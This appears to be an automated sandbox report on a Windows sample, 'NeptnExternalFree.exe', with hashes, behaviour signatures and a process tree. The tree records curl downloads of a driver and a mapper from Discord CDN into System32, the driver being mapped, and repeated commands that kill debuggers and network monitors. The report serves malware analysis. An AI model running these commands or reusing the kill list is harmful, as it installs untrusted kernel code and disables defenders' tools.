Analysis
-
max time kernel
14s -
max time network
33s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
-
submitted
24-03-2023 20:34
General
-
Target
NeptnExternalFree.exe
-
Size
3.4MB
-
MD5
bbedbbb87552cceb179e196588684cbc
-
SHA1
d1b7d2834140f503d7a7b92df30fadece473c29c
-
SHA256
b30dfb8608adf0c39754145ed1e8e8cf391ef1a5cafeb207bdb53dbfe80a4a08
-
SHA512
1e65d28aad644fc791a01eb55d3dc53d6f5c63c5fb5c9e52c96c384b5109499364a0ca433e09383972419b02e53662f15f9d238c4313aeb6842a4057be9429f3
-
SSDEEP
98304:i1NGlQS2DA5FlCPfvJj2wmfXWjY9sz985D:i1N+QXAHlohyP/WsA98B
Score
9/10
Malware Config
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
-
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs 1 IoCs
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 1 IoCs
-
Themida packer 5 IoCs
Detects Themida, an advanced Windows software protection system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Launches sc.exe 22 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Kills process with taskkill 64 IoCs
-
Modifies registry class 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 27 IoCs
-
Suspicious use of FindShellTrayWindow 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\NeptnExternalFree.exe"C:\Users\Admin\AppData\Local\Temp\NeptnExternalFree.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start https://discord.gg/xCRS6yyPF62⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/xCRS6yyPF63⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff956146f8,0x7fff95614708,0x7fff956147184⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,981929177601675851,13700018620429393933,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:24⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,981929177601675851,13700018620429393933,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,981929177601675851,13700018620429393933,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2364 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,981929177601675851,13700018620429393933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3644 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,981929177601675851,13700018620429393933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3624 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,981929177601675851,13700018620429393933,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2092,981929177601675851,13700018620429393933,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3772 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2092,981929177601675851,13700018620429393933,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3220 /prefetch:84⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/879146399290241105/1070367957353500782/NeptnDriver.sys --output C:\Windows\System32\NeptnDriver.sys >nul 2>&12⤵
-
C:\Windows\system32\curl.execurl https://cdn.discordapp.com/attachments/879146399290241105/1070367957353500782/NeptnDriver.sys --output C:\Windows\System32\NeptnDriver.sys3⤵
- Drops file in System32 directory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Ida64.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/879146399290241105/1057075244617187368/mapper.exe --output C:\Windows\System32\mapper.exe >nul 2>&12⤵
-
C:\Windows\system32\curl.execurl https://cdn.discordapp.com/attachments/879146399290241105/1057075244617187368/mapper.exe --output C:\Windows\System32\mapper.exe3⤵
- Drops file in System32 directory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im OllyDbg.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Dbg64.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Dbg32.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\mapper.exe C:\Windows\System32\NeptnDriver.sys2⤵
-
C:\Windows\System32\mapper.exeC:\Windows\System32\mapper.exe C:\Windows\System32\NeptnDriver.sys3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq charles*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq ida*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerProSdk3⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop KProcessHacker33⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop KProcessHacker23⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop KProcessHacker13⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop wireshark3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c pause >nul 2>&12⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq die*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq die*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebugger.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebugger.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im FolderChangesView.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im FolderChangesView.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HttpDebuggerSdk >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HttpDebuggerSdk3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop npf3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&12⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /f /im Ida64.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im OllyDbg.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Dbg64.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Dbg32.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq charles*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq ida*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerProSdk3⤵
- Launches sc.exe
-
